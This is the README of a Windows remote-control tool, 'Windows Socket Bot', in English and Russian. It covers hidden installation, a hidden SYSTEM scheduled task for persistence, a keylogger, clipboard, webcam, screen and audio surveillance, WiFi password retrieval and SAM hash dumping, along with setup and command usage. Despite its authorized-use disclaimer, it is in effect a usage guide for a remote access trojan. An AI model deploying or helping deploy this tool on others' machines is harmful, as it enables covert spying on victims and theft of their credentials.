This software is intended for educational purposes and authorized system administration only.
- ✅ Allowed use: Managing your own devices, penetration testing with explicit written consent, educational research
- ❌ Prohibited use: Unauthorized access to computer systems, violating privacy laws, any illegal activities
The author assumes no responsibility for misuse of this software.
Windows Socket Bot is a comprehensive remote administration tool that provides full system control through direct socket connections.
| Feature | Telegram Bot | Socket Bot |
|---|---|---|
| Communication | Telegram API | Direct TCP socket |
| Internet Required | Yes | No (LAN only) |
| Session Discovery | N/A | Auto-scan local network |
| Multi-client | Yes (Telegram) | Yes (multiple sessions) |
| Real-time Share | No | Screen/Webcam/Audio streaming |
| Interactive Shell | No | Yes (cmd/powershell) |
| File Transfer | Upload/Download | Upload/Download + Zip |
| Category | Capabilities |
|---|---|
| System Control | Reboot, shutdown, hibernate, sleep, logout, process management |
| File System | Browse, upload, download, create, delete, hide, unhide, zip |
| Network | IP config, route table, ARP cache, netstat, WiFi scanning/passwords |
| Registry | Full registry access (create, read, write, delete, enum keys/values) |
| Group Policy | Local Group Policy management (machine/user policies) |
| Services & Tasks | Windows services and Task Scheduler management |
| Device Manager | Device enumeration, driver install/delete, enable/disable/restart |
| User Interface | Screenshot, webcam capture, audio recording, mouse/keyboard control |
| Surveillance | Keylogger (multilingual EN/RU/UA), clipboard monitoring |
| Real-time Share | Screen streaming, webcam streaming, audio streaming → HTML page |
| Interactive Shell | Full cmd/powershell with directory navigation |
| Session Discovery | Auto-scan local network for active sessions |
| Persistence | Services, tasks, startup (registry/folder), environment variables |
| Security | User management, app blocking, website blocking, hash dump (SAM/SECURITY) |
| Feature | Description |
|---|---|
| 🔌 Direct Socket | TCP connection on configurable port |
| 📦 ZLIB Compression | All data compressed with wbits=-15, level=9 |
| 🔐 XOR Encryption | 16-bit rolling key encryption (SEED-based) |
| 🧵 Multi-threaded | ThreadPoolExecutor for parallel operations |
| 🔍 Auto-discovery | Scans local /24 subnet for active sessions |
| 📡 Chunked Transfer | 256KB chunks with length prefix |
| Mode | Description | Output |
|---|---|---|
share -s |
Screen streaming | Live PNG frames → HTML |
share -w |
Webcam streaming | Live PNG frames → HTML |
share -a |
Audio streaming | Live MP3 chunks → HTML |
How it works:
- Client requests
share -s/-w/-a - Server continuously sends frames/chunks
- Client writes to file and opens HTML page
- HTML auto-refreshes every second
- Press
Ctrl+Cto stop
# Enter cmd
cmd
# Enter powershell
powershell
# Navigate
cd C:\Users
# Execute commands
dir
whoami
ipconfig
# Exit shell
exit# Client scans local network for active sessions
found = find_server(ip)
# Output:
id: 0 | session: 192.168.1.100
id: 1 | session: 192.168.1.101
# Connect to session
Enter session id: 0┌─────────────────────────────────────────────────────────────────┐
│ SERVER (Target) │
├─────────────────────────────────────────────────────────────────┤
│ • Listens on PORT (default: 2022) │
│ • Multi-threaded: one thread per client │
│ • XOR encryption + ZLIB compression │
│ • Full system control API │
└─────────────────────────────────────────────────────────────────┘
↑
│ TCP Socket
↓
┌─────────────────────────────────────────────────────────────────┐
│ CLIENT (Controller) │
├─────────────────────────────────────────────────────────────────┤
│ • Scans local network for sessions │
│ • Connects to selected server │
│ • Interactive command interface │
│ • File download/upload with progress │
│ • Real-time share (screen/webcam/audio) │
└─────────────────────────────────────────────────────────────────┘
Client Server
│ │
├────── 0x1155cea24bacb916 ────→│ (Request SEED)
│←───── SEED (as string) ───────┤
│ │
├────── 0x7294cc821afdc797 ────→│ (Connect session)
│←───── 0x7b833a928d167ab6 ────┤
│ │
│←───── Session info ───────────┤
├────── 0x628057b78a560e64 ────→│
│←───── Node\User ──────────────┤
├────── 0x3856b3888f50563b ────→│
│←───── Full system info ───────┤
│ │
│ [Command Loop] │
├────── 0x403d9ff550597db8 ────→│ (Ready for command)
├────── Command ────────────────→│
│←───── Response ───────────────┤
│ │
├────── "exit" ─────────────────→│ (Close session)
- Windows 7/8/10/11
- Python 3.8+
- Administrator rights (for full functionality)
git clone https://github.com/vk-candpython/windows-socket-bot.git
cd windows-socket-bot
pip install -r requirements.txtServer (bot.py):
#-------------------------|NECESSARILY|-------------------------#
PORT = 2022 # Server port
SEED = 12345 # Encryption seed
PATH = "C:\\ProgramData\\MyBot" # Installation directory
#-----------------------------|END|-----------------------------#
#-------------------------|OPTIONAL|-------------------------#
BOT_TASK_NAME = "MyBot" # Task Scheduler name
BOT_TASK_DESCRIPTION = "My Bot" # Task description
BOT_EXE = True # Run as persistent task
#----------------------------|END|---------------------------#Client (session.py):
PORT = 2022 # Must match server PORTServer (on target machine as Administrator):
python bot.pyClient (on controller machine):
python session.pyAUTHOR: Vladislav Khudash
Do you want to find sessions
Yes\No: yes
find for sessions has started [*]
id: 0 | session: 192.168.1.100
id: 1 | session: 192.168.1.105
Enter session id: 0
C:\ProgramData\MyBot\ # PATH (hidden)
├── bot.py # Main server script
├── mem/ # Not used (legacy)
├── sys/ # System files
│ ├── config/ # Encrypted configs
│ │ └── 0x6e17263f779dce5a # SEED
│ ├── 0x3b8f1289273df19c # Restart flag
│ ├── 0x79f2d2686b6da01e # Autostart entries (encrypted)
│ └── 0x2a47be6d04a14df5 # Keylogger flag
├── tmp/ # Temporary files
│ ├── 0x1f95051e7493c896 # Blocked apps list
│ └── 0x4b0944084a778666 # Keylogger data
└── share/ # Uploaded files
session-{ip}/ # Per-session directory
├── info.txt # Server system info
├── downloads/ # Downloaded files (cat)
├── zip/ # Downloaded archives (zip)
├── screenshot/ # Screenshots (screen -s)
├── webcamshot/ # Webcam captures (webcam)
├── audio/ # Audio recordings (audio)
└── share/ # Share streaming files
├── index.html # Auto-generated HTML
├── img.png # Screen/Webcam frame
└── audio.mp3 # Audio chunk
def encrypt(data):
k0, k1 = KEY # Generated from SEED (1-8, 1-256)
f = 0
for i, c in enumerate(data):
n = ord(c)
x = (n << k0) ^ (((k1 + f) + i) & 0xFF)
f = (f ^ x) & 0xFF
yield chr(x)┌─────────────────────────────────────────────────────────────────┐
│ 1. Original data (string or bytes) │
└─────────────────────────────────────────────────────────────────┘
↓
┌─────────────────────────────────────────────────────────────────┐
│ 2. XOR Encryption (if string) │
│ • Rolling key with feedback │
└─────────────────────────────────────────────────────────────────┘
↓
┌─────────────────────────────────────────────────────────────────┐
│ 3. ZLIB Compression │
│ • wbits=-15 (raw deflate) │
│ • level=9, memLevel=9 │
│ • 256KB chunks │
└─────────────────────────────────────────────────────────────────┘
↓
┌─────────────────────────────────────────────────────────────────┐
│ 4. Chunked Transfer │
│ • 4-byte length prefix (big-endian) │
│ • ACK byte after each chunk │
│ • Zero-length chunk signals EOF │
└─────────────────────────────────────────────────────────────────┘
| Command | Description |
|---|---|
help |
Show all commands |
clear |
Clear screen |
session |
Session information |
gethost |
Current host (IP:PORT) |
getpid |
Current PID |
getuid |
Current user |
getsystem |
Get SYSTEM rights |
restart |
Restart bot |
exit |
Log out |
# Enter cmd
cmd
# Enter powershell
powershell
# Inside shell:
cd C:\Users
dir
whoami
exit# Stream screen
share -s
# Stream webcam
share -w
# Stream audio
share -a
# Press Ctrl+C to stop# Download file
cat C:\Users\user\document.pdf
# Upload file
upload C:\local\file.txt
# Zip current directory
zip# Full system info
systeminfo
# Process list
ps
# Kill process
kill notepad.exe
kill 1234
# Execute command
cmd
powershell# Create key
reg -c HKEY_CURRENT_USER\Software\MyApp -n Settings
# Set value
reg -c HKEY_CURRENT_USER\Software\MyApp -n Version -v "1.0" -t sz
# Get value
reg -g HKEY_CURRENT_USER\Software\MyApp -n Version# Screenshot
screen -s
# Webcam
webcam
# Record 10 seconds
audio 10
# Move mouse
mouse -x 500 -y 300 -d 1
# Type text
keyboard -t "Hello" -d 1
# Get clipboard
clipboard -gPORT = 2022 # Server port
SEED = 12345 # Encryption seed (1-65535)
PATH = "C:\\ProgramData\\MyBot" # Installation directory
BOT_EXE = True # Run as persistent task
BOT_TASK_NAME = "MyBot" # Task Scheduler name
BOT_TASK_DESCRIPTION = "My Bot" # Task descriptionPORT = 2022 # Must match server PORT# View config
config -g
# Change SEED
config SEED -s 54321
# Reset SEED
config -r SEEDCreates task that runs every minute:
- User: SYSTEM or current user
- Hidden: true
- Priority: highest
- Restarts if failed
autostart -c name -p C:\app.exe -a "args" -w true
autostart -l
autostart -d namestartup -c machine MyApp -p C:\app.exe -a none
startup -g
startup -d machine MyAppservice -c MyService -n "Display" -d "Desc" -p C:\app.exe -a none -m autostart-
Client requests share mode:
share -s # Screen share -w # Webcam share -a # Audio
-
Server starts streaming:
- Screen:
msscaptures monitor 1, converts to PNG - Webcam:
opencvcaptures frame, converts to PNG - Audio:
sounddevicerecords 1-second chunks
- Screen:
-
Client receives and displays:
- Creates
session-{ip}/share/directory - Generates
index.htmlwith auto-refresh - Opens HTML in default browser
- Continuously updates file with new frames
- Creates
-
Stop sharing:
- Press
Ctrl+Cin client terminal - Client sends stop signal
0x2a44738d62feabcf
- Press
<html>
<head>
<meta http-equiv="refresh" content="1">
<title>{hostname}</title>
</head>
<body>
<img src="img.png" width="1080">
<!-- or -->
<audio controls autoplay>
<source src="audio.mp3" type="audio/mpeg">
</audio>
</body>
</html>Windows Socket Bot — это комплексный инструмент удалённого администрирования, предоставляющий полный контроль над системой через прямое сокет-соединение.
| Функция | Telegram Bot | Socket Bot |
|---|---|---|
| Связь | Telegram API | Прямой TCP сокет |
| Интернет | Требуется | Нет (только LAN) |
| Поиск сессий | Н/Д | Авто-сканирование сети |
| Мульти-клиент | Да (Telegram) | Да (несколько сессий) |
| Share в реальном времени | Нет | Экран/Вебкамера/Аудио |
| Интерактивная оболочка | Нет | Да (cmd/powershell) |
| Функция | Описание |
|---|---|
| 🔌 Прямой сокет | TCP соединение на настраиваемом порту |
| 📦 ZLIB сжатие | Все данные сжимаются с wbits=-15, level=9 |
| 🔐 XOR шифрование | 16-битный скользящий ключ (на основе SEED) |
| 🧵 Многопоточность | ThreadPoolExecutor для параллельных операций |
| 🔍 Авто-обнаружение | Сканирование локальной /24 подсети |
| 📡 Чанковая передача | Чанки по 256KB с префиксом длины |
| Режим | Описание | Вывод |
|---|---|---|
share -s |
Стрим экрана | Live PNG кадры → HTML |
share -w |
Стрим вебкамеры | Live PNG кадры → HTML |
share -a |
Стрим аудио | Live MP3 чанки → HTML |
# Войти в cmd
cmd
# Войти в powershell
powershell
# Навигация
cd C:\Users
# Выполнение команд
dir
whoami
exit(См. английскую версию для диаграммы)
- Windows 7/8/10/11
- Python 3.8+
- Права администратора
git clone https://github.com/vk-candpython/windows-socket-bot.git
cd windows-socket-bot
pip install -r requirements.txtСервер (bot.py):
PORT = 2022
SEED = 12345
PATH = "C:\\ProgramData\\MyBot"Клиент (session.py):
PORT = 2022Сервер:
python bot.pyКлиент:
python session.py# Стрим экрана
share -s
# Стрим вебкамеры
share -w
# Стрим аудио
share -a
# Ctrl+C для остановки# Скачать файл
cat C:\Users\user\document.pdf
# Загрузить файл
upload C:\local\file.txt
# Архив текущей директории
zip# cmd
cmd
# powershell
powershell
# Внутри оболочки:
cd C:\Users
dir
exitDirect Socket Remote Administration — Full Windows Control